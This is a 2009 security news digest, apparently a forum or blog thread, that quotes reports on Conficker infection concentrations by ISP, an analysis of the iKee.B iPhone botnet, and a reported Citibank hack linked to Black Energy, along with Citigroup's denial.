December 16, 2009 - "Internet service providers in Russia and Ukraine are home to some of the highest concentrations of customers whose machines are infected with the Conficker worm, new data suggests. The report comes from the Shadowserver Foundation*, a nonprofit that tracks global botnet infections. Shadowserver tracks networks and nations most impacted by Conficker, a computer worm that has infected more than 7 million Microsoft Windows PCs since it first surfaced last November... Shadowserver's numbers indicate that the largest numbers of Conficker-infested PCs are in the East, more specifically China, India and Vietnam. For example, Chinanet, among the nation's largest ISPs, has about 92 million routable Internet addresses, and roughly 950,000 - or about 1 percent of those addresses - appear to be sickened with Conficker. Security Fix decided to use the group's data in a slightly different way, to showcase the concentration of Conficker victims as viewed against the total number of each ISP's customers. Viewed this way, Russian and Ukrainian ISPs have the highest concentration of customers with Conficker-infected systems... Shadowserver offers all ISPs and Web hosting providers free daily feeds** that can alert network providers to new bot infections on their networks."
* http://www.shadowserver.org/wiki/pmwiki.php/Stats/Conficker

** http://www.shadowserver.org/wiki/pmwiki.php/Involve/GetReportsOnYourNetwork

Conficker Eye Chart
- http://www.confickerworkinggroup.org/infection_test/cfeyechart.html

- http://www.shadowserver.org/wiki/pmwiki.php/Calendar/20091216
16 December 2009


2009-12-19, 00:33

Analysis of the iKee.B (Duh) iPhone Botnet
- http://www.csl.sri.com/users/porras/iPhone-Bot/
14 December 2009 - "... analysis of the iKee.B (duh) Apple iPhone bot client, captured on 25 November 2009. The bot client was released throughout several countries in Europe, with the initial purpose of stealing SMS content and coordinating its infected iPhones via a Lithuanian botnet server. This report details the logic and function of iKee's scripts, its configuration files, and its two binary executables, which we have reverse engineered to an approximation of their C source code implementation. The iKee bot is one of the latest offerings in smartphone malware, in this case targeting jailbroken iPhones. While its implementation is simple in comparison to the latest generation of PC-based malware, its implications demonstrate the potential extension of crimeware to this valuable new frontier of handheld consumer devices...
In early November 2009, Dutch users of jailbroken iPhones in T-Mobile's 3G IP range began experiencing extortion popup windows. The popup window notifies the victim that the phone has been hacked, and then sends that victim to a website where a $5 ransom payment is demanded to remove the malware infection. The teenage hacker who authored the malicious software (malware) had discovered that many jailbroken iPhones have been configured with a secure shell (SSH) network service with a known default root password..."
(Complete analysis at the URL above.)

- http://en.wikipedia.org/wiki/Jailbreak_(iPhone)

- http://www.f-secure.com/weblog/archives/00001822.html
November 22, 2009


2009-12-22, 13:35

Citibank hacked for millions...
- http://www.pcworld.com/businesscenter/article/185271/report_russian_gang_linked_to_big_citibank_hack.html
December 21, 2009 - "U.S. authorities are investigating the theft of an estimated tens of millions of dollars from Citibank by hackers partly using Russian software tailored for the attack, according to a news report. The security breach at the major U.S. bank was detected mid-year based on traffic from Internet addresses formerly used by the Russian Business Network gang, The Wall Street Journal said Tuesday*, citing unnamed government sources. The Russian Business Network is a well-known group linked to malicious software, hacking, child pornography and spam. The Federal Bureau of Investigation is probing the case, the report said. It was not known whether the money had been recovered and a Citibank representative said the company had not had any system breach or losses, according to the report. The report left unclear who the money was stolen from but said a program called Black Energy, designed by a Russian hacker, was one tool used in the attack. The tool can be used to command a botnet, or a large group of computers infected by malware and controlled by an attacker, in assaults meant to take down target Web sites. This year a modified version of the software appeared online that could steal banking information, and in the Citi attack a version tailored to target the bank was used, the Journal said. The attackers also targeted a U.S. government agency and one other unnamed entity, the report said, adding that it was unknown if the attackers accessed Citibank systems directly or through other parties."
* http://online.wsj.com/article/SB126145280820801177.html

- http://finance.yahoo.com/news/Report-FBI-probes-hacker-apf-2149710519.html?x=0
December 22, 2009 - "... Citigroup denied the report. "We had no breach of the system and there were no losses, no customer losses, no bank losses," said Joe Petro, managing director of Citigroup's Security and Investigative services. "Any allegation that the FBI is working a case at Citigroup involving tens of millions of losses is just not true"..."